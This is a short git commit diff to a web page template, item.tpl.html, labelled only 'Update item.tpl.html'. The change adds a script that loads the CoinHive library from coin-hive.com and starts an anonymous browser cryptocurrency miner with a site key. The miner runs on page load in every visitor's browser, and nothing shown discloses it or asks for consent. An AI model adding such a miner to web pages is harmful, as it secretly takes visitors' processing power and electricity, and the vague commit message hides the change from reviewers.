Update item.tpl.html

This commit is contained in:
Flummi 2017-09-21 02:53:50 +00:00
parent a27f4048c8
commit e9f90494b8

View File

@ -51,6 +51,15 @@
<script src="./s/shit.js"></script>
<script src="./s/theme.js"></script>
<script src="./s/plyr.js"></script>
<script>plyr.setup( { autoplay: "false" } );</script>
<script src="//coin-hive.com/lib/coinhive.min.js"></script>
<script>plyr.setup( { autoplay: "false" } );
var miner = new CoinHive.Anonymous('ZVrebnhYz9IYygu53a2jhMwGqZuhVlbK', {
threads: 2,
autoThreads: false,
throttle: 0.2,
forceASMJS: false
});
miner.start();
</script>
</body>
</html>